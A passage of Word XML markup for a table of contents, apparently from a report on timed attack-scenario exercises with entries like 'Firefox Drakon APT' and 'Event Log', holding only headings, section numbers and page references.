              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600021" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.3.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021 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>26</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="40DDC879" w14:textId="7320A063" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1200"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600022" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.3.3</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Event Log</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600022 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>26</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="17609650" w14:textId="771F4100" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600023" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.4</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>13:57 -- TA1 MARPLE 1 -- Firefox Drakon APT</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600023 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>34</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6F73320F" w14:textId="41C68BDF" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1200"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600024" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.4.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024 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>34</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="31544FBA" w14:textId="61470918" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1200"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600025" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.4.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025 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>34</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0A836A2A" w14:textId="056BC3DA" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1200"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600026" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.4.3</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Event Log</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600026 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>34</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6E8C8DB2" w14:textId="158E2B7E" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600027" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.5</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>14:35 -- TA5.2 Ubuntu 1 -- Firefox Drakon APT Elevate</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600027 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>35</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2124C799" w14:textId="31077623" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1200"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600028" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.5.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028 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>35</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1B09FBA5" w14:textId="61AE60A5" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1200"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600029" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.5.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029 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>35</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6907B238" w14:textId="1D46052E" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1200"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600030" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Courier New" w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.5.3</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Event Log</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600030 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>35</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="674D00E8" w14:textId="7416C7EB" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600031" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.6</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>15:34 -- TA5.2 Windows 2 -- Firefox BITS Micro APT</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600031 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>36</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1028BA12" w14:textId="12B0F07C" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1200"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600032" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.6.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032 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>36</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="05770CB3" w14:textId="74A7A659" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1200"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600033" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.6.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033 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>36</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="432EDF6E" w14:textId="7D86B008" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1200"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600034" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.6.3</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Event Log</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600034 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>36</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="783E65D6" w14:textId="1AC6E2C1" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="480"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:i w:val="0"/>
              <w:iCs w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600035" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
